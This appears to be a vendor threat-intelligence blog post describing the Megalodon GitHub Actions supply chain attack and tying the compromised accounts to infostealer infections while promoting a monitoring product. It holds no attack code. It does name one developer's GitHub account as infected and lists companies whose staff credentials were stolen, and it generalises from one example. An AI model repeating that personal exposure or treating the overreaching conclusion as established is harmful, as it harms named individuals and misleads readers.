Megalodon: Infostealers Just Spawned a 5,000+ Repo GitHub Supply Chain Attack

The cybersecurity community was recently rocked by a massive, automated supply chain attack dubbed Megalodon. Within a span of just six hours, malicious actors pushed thousands of commits to public GitHub repositories, infecting over 5,000+ repos and injecting a devastating Base64-encoded payload directly into CI/CD workflows.

As initially discovered by OX Security and further analyzed by SafeDep, the Megalodon campaign targeted GitHub Actions. By exploiting weak branch protections and utilizing throwaway or compromised accounts, the attackers deployed workflows designed to drain every secret a runner could reach – including AWS keys, GCP OAuth tokens, SSH private keys, and GitHub OIDC tokens – as well as to deploy additional infostealers to further compromise the targeted environments.

The Catalyst: Shai Hulud Goes Open Source

How did threat actors suddenly acquire the capability to orchestrate such a massive, synchronized campaign? The answer lies in the democratization of malware. Just weeks prior, the financially motivated cybercrime group TeamPCP open-sourced their notorious Shai Hulud framework.

As Datadog Security Labs highlighted in their static analysis, the release of this production-grade offensive framework provided a blueprint for credential harvesting and supply chain poisoning. By leaking their own source code, TeamPCP lowered the barrier to entry, effectively inviting a wave of copycat attacks – of which Megalodon is the most severe manifestation.

The Hudson Rock Discovery: Infostealers Are the Root Cause

While the mechanics of the CI/CD injection are well-documented, the origin of the compromised GitHub accounts used to push the malware has remained a question mark. To solve this, Hudson Rock analyzed the list of usernames associated with the affected repositories that were observed pushing the infostealer.

By cross-referencing these GitHub usernames against our vast cybercrime intelligence database, we made a startling discovery: 331 out of 978 unique usernames (over 33%) were direct matches to computers infected by infostealers.

(you can do it yourself for free without registration via CavalierGPT – up to 100 usernames bulk search at once)

Digging Deeper: The Hidden Infections

A 33% exact-match rate based solely on usernames is incredibly high, but we suspected the actual number of compromised accounts was near 100%. Usernames on GitHub often don’t identically match the usernames or emails recovered in infostealer logs. To prove this, our researchers conducted a manual deep dive into a username initially determined as “not found” in our database: bryanalexandersantoso.

By analyzing the public commit history of this user, we were able to extract an email address associated with one of their older commits: [email protected].

When we ran this email address through the Hudson Rock database, we immediately identified a recent infostealer infection. This confirms a crucial hypothesis: Even if a GitHub username isn’t a direct match in an initial scan, deep-dive investigations routinely link the account back to an infostealer infection.

This leads us to a definitive conclusion: The affected accounts enabling the Megalodon supply chain attack are exclusively sourced from infostealer data.

Introducing Hudson Rock’s Supply Chain Monitoring Feature

The Megalodon campaign is a stark reminder that if developers and employees are infected with infostealers, platforms like GitHub become the launchpad for devastating cascading events. To combat this, Hudson Rock has just released a powerful new Supply Chain feature.

This new capability – which can be utilized for any domain – reveals the incredible amount of compromised corporate credentials associated with third-party platforms. When we point this feature at GitHub.com, the results are alarming: Over 24,000 companies have employees with compromised GitHub credentials.

These aren’t just small startups. Our data maps several large, multinational corporations. For example, we identified employees at Anheuser-Busch InBev (an-inbev.com) whose corporate credentials for GitHub have been stolen – exactly the kind of high-value access that enables supply chain attacks.

In other instances, the sheer volume of compromise within a single entity presents a massive risk. For accenture.com, we discovered over 10 distinct employees infected by infostealers who possess credentials to GitHub. If attackers leverage these specific credentials, they could potentially access sensitive, proprietary corporate data stored in private repositories.

The supply chain risks extend far beyond GitHub. By mapping the partner ecosystem of a major enterprise like Dell (dell.com), our feature identified over 11,000 partners – such as ABB (abb.com) – whose employees have suffered infostealer infections and had credentials stolen that grant access to Dell’s infrastructure.

The Data: Large Companies with Compromised GitHub Credentials

To illustrate the sheer scale of the supply chain risks associated with GitHub.com from infostealer infections, we have compiled a list of large companies – out of the 24,000+ companies identified – where Hudson Rock detected at least one compromised corporate credential granting access to GitHub. (e.g., at least one @adobe.com credential belonging to an employee for github.com).

Previewing the top companies below. Click the button to expand the full list of companies.

View All Companies